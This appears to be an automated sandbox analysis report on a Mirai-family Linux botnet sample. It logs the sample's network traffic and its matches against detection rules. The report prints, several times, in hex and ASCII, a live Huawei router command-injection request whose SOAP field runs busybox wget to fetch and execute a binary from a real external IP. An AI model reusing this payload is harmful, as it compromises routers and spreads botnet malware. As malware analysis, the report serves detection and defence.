s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: unknownTCP traffic detected without corresponding DNS query: 197.108.98.81
          Source: unknownTCP traffic detected without corresponding DNS query: 197.19.68.200
          Source: unknownTCP traffic detected without corresponding DNS query: 197.11.136.200
          Source: unknownTCP traffic detected without corresponding DNS query: 157.22.232.44
          Source: unknownTCP traffic detected without corresponding DNS query: 41.217.239.125
          Source: unknownTCP traffic detected without corresponding DNS query: 162.189.159.97
          Source: unknownTCP traffic detected without corresponding DNS query: 197.126.181.1
          Source: unknownTCP traffic detected without corresponding DNS query: 41.155.18.75
          Source: unknownTCP traffic detected without corresponding DNS query: 197.55.193.145
          Source: unknownTCP traffic detected without corresponding DNS query: 32.70.63.136
          Source: unknownTCP traffic detected without corresponding DNS query: 207.230.18.128
          Source: unknownTCP traffic detected without corresponding DNS query: 197.42.140.11
          Source: unknownTCP traffic detected without corresponding DNS query: 157.193.222.248
          Source: unknownTCP traffic detected without corresponding DNS query: 157.212.119.57
          Source: unknownTCP traffic detected without corresponding DNS query: 157.157.26.182
          Source: unknownTCP traffic detected without corresponding DNS query: 41.188.130.212
          Source: unknownTCP traffic detected without corresponding DNS query: 25.220.131.205
          Source: unknownTCP traffic detected without corresponding DNS query: 41.69.170.85
          Source: unknownTCP traffic detected without corresponding DNS query: 178.64.112.9
          Source: unknownTCP traffic detected without corresponding DNS query: 157.170.92.181
          Source: unknownTCP traffic detected without corresponding DNS query: 41.179.57.12
          Source: unknownTCP traffic detected without corresponding DNS query: 41.105.159.159
          Source: unknownTCP traffic detected without corresponding DNS query: 109.169.161.130
          Source: unknownTCP traffic detected without corresponding DNS query: 165.13.117.149
          Source: unknownTCP traffic detected without corresponding DNS query: 157.4.171.221
          Source: unknownTCP traffic detected without corresponding DNS query: 207.124.200.237
          Source: unknownTCP traffic detected without corresponding DNS query: 41.60.71.214
          Source: unknownTCP traffic detected without corresponding DNS query: 197.203.50.211
          Source: unknownTCP traffic detected without corresponding DNS query: 150.104.69.229
          Source: unknownTCP traffic detected without corresponding DNS query: 197.108.181.127
          Source: unknownTCP traffic detected without corresponding DNS query: 41.179.158.16
          Source: unknownTCP traffic detected without corresponding DNS query: 157.125.35.75
          Source: unknownTCP traffic detected without corresponding DNS query: 197.226.15.217
          Source: unknownTCP traffic detected without corresponding DNS query: 197.199.221.146
          Source: unknownTCP traffic detected without corresponding DNS query: 41.41.111.225
          Source: unknownTCP traffic detected without corresponding DNS query: 41.192.243.71
          Source: unknownTCP traffic detected without corresponding DNS query: 203.30.50.212
          Source: unknownTCP traffic detected without corresponding DNS query: 41.152.77.47
          Source: unknownTCP traffic detected without corresponding DNS query: 156.140.83.4
          Source: unknownTCP traffic detected without corresponding DNS query: 41.249.66.231
          Source: unknownTCP traffic detected without corresponding DNS query: 204.143.20.70
          Source: unknownTCP traffic detected without corresponding DNS query: 41.213.7.117
          Source: unknownTCP traffic detected without corresponding DNS query: 197.115.50.219
          Source: unknownTCP traffic detected without corresponding DNS query: 41.69.250.226
          Source: unknownTCP traffic detected without corresponding DNS query: 202.213.139.72
          Source: unknownTCP traffic detected without corresponding DNS query: 41.237.254.184
          Source: unknownTCP traffic detected without corresponding DNS query: 217.81.237.133
          Source: unknownTCP traffic detected without corresponding DNS query: 41.1.165.81
          Source: unknownTCP traffic detected without corresponding DNS query: 41.213.47.74
          Source: unknownTCP traffic detected without corresponding DNS query: 157.248.136.195
          Source: global trafficDNS traffic detected: DNS query: telnet.8b8n.com
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: x86.nn.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: x86.nn.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: x86.nn.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
